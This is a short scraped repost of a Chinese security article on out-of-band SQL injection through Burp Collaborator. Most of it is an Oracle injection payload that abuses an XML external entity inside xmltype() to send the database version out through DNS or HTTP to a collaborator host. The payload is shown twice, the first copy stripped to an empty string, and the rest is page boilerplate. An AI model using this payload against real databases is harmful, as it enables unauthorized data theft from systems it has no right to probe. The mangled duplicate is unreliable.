Version Payload :
(select extractvalue(xmltype(' '),'/l') from dual)
原文始发于微信公众号(Khan安全攻防实验室):通过Burp使用DNS协作器进行的带外SQL攻击
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
聚合网络安全,存储安全技术文章,融合安全最新讯息
Version Payload :
(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % vapot SYSTEM "'||(select version from v$instance)||'Burp/">%vapot;]>'),'/l') from dual)
原文始发于微信公众号(Khan安全攻防实验室):通过Burp使用DNS协作器进行的带外SQL攻击
评论